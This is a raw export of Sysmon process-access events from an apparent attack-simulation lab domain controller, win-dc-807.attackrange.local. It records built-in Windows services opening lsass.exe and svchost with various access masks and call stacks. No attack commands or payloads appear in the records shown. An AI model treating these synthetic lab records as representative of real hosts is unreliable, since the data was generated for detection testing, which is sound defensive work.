15:51:00.675{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1200-000000008801}1216C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000836Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.675{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1200-000000008801}1216C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000835Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.644{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-0E00-000000008801}1080C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000834Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.644{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-0E00-000000008801}1080C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000833Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.644{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-0F00-000000008801}1136C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000832Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.644{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-0F00-000000008801}1136C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000831Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.628{D28789B6-7C62-5FA1-0A00-000000008801}852936C:\Windows\system32\services.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000830Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.628{D28789B6-7C62-5FA1-0A00-000000008801}852936C:\Windows\system32\services.exe{D28789B6-7C64-5FA1-1400-000000008801}1312C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000829Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.628{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000828Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.628{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C64-5FA1-1400-000000008801}1312C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000827Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.628{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000826Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.628{D28789B6-7C62-5FA1-0A00-000000008801}852940C:\Windows\system32\services.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000825Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.628{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C64-5FA1-1400-000000008801}1312C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000824Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.628{D28789B6-7C62-5FA1-0A00-000000008801}852944C:\Windows\system32\services.exe{D28789B6-7C64-5FA1-1400-000000008801}1312C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000823Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.628{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000822Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.628{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000821Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.628{D28789B6-7C64-5FA1-0C00-000000008801}6081124C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000820Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.628{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000819Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.628{D28789B6-7C62-5FA1-0B00-000000008801}86896C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000818Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.628{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000817Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.628{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000816Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.628{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000815Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.628{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000814Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.628{D28789B6-7C62-5FA1-0B00-000000008801}86896C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000813Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:00.628{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000812Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 